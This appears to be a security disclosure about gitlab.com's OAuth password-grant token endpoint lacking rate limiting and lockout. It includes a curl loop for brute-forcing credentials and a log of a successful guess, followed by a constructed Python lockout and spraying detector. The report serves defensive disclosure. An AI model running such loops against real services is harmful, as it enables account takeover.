ESCALATED: OAuth Token Endpoint Susceptible to Brute-Force Attacks and Credential Spraying
Summary
The endpoint https://gitlab.com/oauth/token, used with the grant_type=password parameter, allows potential attackers to evade all safeguards against credential spraying and account brute-forcing that exist on gitlab.com/users/sign_in, among them:
- An arbitrary number of requests can be sent at an arbitrary cadence, so credentials can be tested reliably.
- Accounts being brute-forced are never blocked, even after 10 failed attempts at generating valid OAuth tokens. Blocking after 10 failures is what normally happens for login attempts over /users/sign_in.
Steps to reproduce
The absence of rate limiting can be tested easily by repeatedly sending POST grant_type=password requests to oauth/token, as shown on https://docs.gitlab.com/ce/api/oauth2.html#resource-owner-password-credentials:
while true; do echo -n "$(date +'%T') -) "; curl --data 'grant_type=password&username=mymail@domain.com&password=mypassword' --request POST https://gitlab.com/oauth/token; echo; done
Logs from a real test run look as follows (the correct password is found on the 13th attempt, and none of the preceding failures triggered a block):
1561656152.6030874 e: myemail@gitlab.com p: abcde@ valid: False 401
1561656153.3011422 e: myemail@gitlab.com p: abcdeA valid: False 401
1561656154.5376472 e: myemail@gitlab.com p: abcdeB valid: False 401
1561656155.155709 e: myemail@gitlab.com p: abcdeC valid: False 401
1561656155.7969038 e: myemail@gitlab.com p: abcdeD valid: False 401
1561656156.7311993 e: myemail@gitlab.com p: abcdeE valid: False 401
1561656157.3582034 e: myemail@gitlab.com p: abcdeF valid: False 401
1561656158.0892327 e: myemail@gitlab.com p: abcdeG valid: False 401
1561656158.9248016 e: myemail@gitlab.com p: abcdeH valid: False 401
1561656159.6772146 e: myemail@gitlab.com p: abcdeI valid: False 401
1561656160.5643692 e: myemail@gitlab.com p: abcdeJ valid: False 401
1561656161.3276572 e: myemail@gitlab.com p: abcdeK valid: False 401
1561656162.0689363 e: myemail@gitlab.com p: abcdeL valid: False 401
1561656162.8939586 e: myemail@gitlab.com p: abcdeM valid: True 200
{'access_token': '********************************************', 'token_type': 'bearer', 'refresh_token': '*******************************************************', 'scope': 'api', 'created_at': 1561473301}
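The control the report shows to be missing, as an added example that is not part of the report or of GitLab's code: a sliding-window failure counter in front of the token endpoint that refuses further requests for an account after the same 10 failures that lock a /users/sign_in login, and flags a source address that fails against many distinct accounts (spraying). The server-side log format, IP addresses, usernames and thresholds are constructed for the example; the sample log mirrors the report's pattern of one account hit repeatedly until the 13th attempt succeeds.

```python
"""Sliding-window brute-force and credential-spraying guard for an OAuth
token endpoint.  Added example, not GitLab code; log format is constructed."""
from collections import defaultdict, deque

# Assumed tunables: the same 10-failure lockout the report describes for
# /users/sign_in, applied to /oauth/token as well.
LOCKOUT_FAILURES = 10   # failures per account before further attempts are refused
WINDOW_SECONDS = 600    # sliding window in which failures are counted
SPRAY_ACCOUNTS = 5      # distinct accounts one source IP may fail against in the window

# Constructed server-side access log in a hypothetical format:
#   <epoch> <source_ip> <username> <http_status>
# 203.0.113.5 hammers "alice" and would get the right password on try 13;
# 198.51.100.7 tries six different accounts once each.
SAMPLE_LOG = "\n".join(
    [f"{1561656152 + i} 203.0.113.5 alice {401 if i < 12 else 200}" for i in range(13)]
    + [f"{1561656170 + i} 198.51.100.7 {u} 401"
       for i, u in enumerate(["bob", "carol", "dave", "erin", "frank", "grace"])]
)


def parse_line(line):
    """Split one constructed log line into (timestamp, ip, user, status)."""
    ts, ip, user, status = line.split()
    return int(ts), ip, user, int(status)


class TokenEndpointGuard:
    def __init__(self):
        self.failures_by_user = defaultdict(deque)  # user -> failure timestamps in window
        self.targets_by_ip = defaultdict(dict)      # ip -> {user: last failure timestamp}
        self.spraying_ips = set()

    def _prune(self, dq, now):
        # Drop failures older than the window from the left of the deque.
        while dq and now - dq[0] > WINDOW_SECONDS:
            dq.popleft()

    def is_locked(self, user, now):
        dq = self.failures_by_user[user]
        self._prune(dq, now)
        return len(dq) >= LOCKOUT_FAILURES

    def handle(self, ts, ip, user, status):
        """Decide what the endpoint should do with this request:
        'locked'  - refuse before the password is even checked,
        'denied'  - password check failed, failure recorded,
        'granted' - password check passed."""
        if self.is_locked(user, ts):
            return "locked"
        if status != 200:
            self.failures_by_user[user].append(ts)
            targets = self.targets_by_ip[ip]
            targets[user] = ts
            # Forget accounts whose last failure from this IP fell out of the window.
            for stale in [u for u, t in targets.items() if ts - t > WINDOW_SECONDS]:
                del targets[stale]
            if len(targets) >= SPRAY_ACCOUNTS:
                self.spraying_ips.add(ip)
            return "denied"
        return "granted"


def analyze(log_text):
    """Replay a log through the guard; returns per-request decisions and
    the set of source IPs that fanned out across many accounts."""
    guard = TokenEndpointGuard()
    decisions = [guard.handle(*parse_line(line))
                 for line in log_text.splitlines() if line.strip()]
    return {"decisions": decisions, "spraying_ips": sorted(guard.spraying_ips)}


if __name__ == "__main__":
    result = analyze(SAMPLE_LOG)
    print(result["decisions"].count("locked"), "requests refused by lockout")
    print("spraying sources:", result["spraying_ips"])
```

With the lockout in place the 13th request for "alice" (the one whose password is correct) is refused as "locked" before any password comparison, so the brute force never yields a token; the second source is flagged once it has failed against five distinct accounts, which is the spraying pattern a per-account counter alone would miss.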
cc @gitlab-com/gl-security/secops @gitlab-com/gl-security/appsec @asaba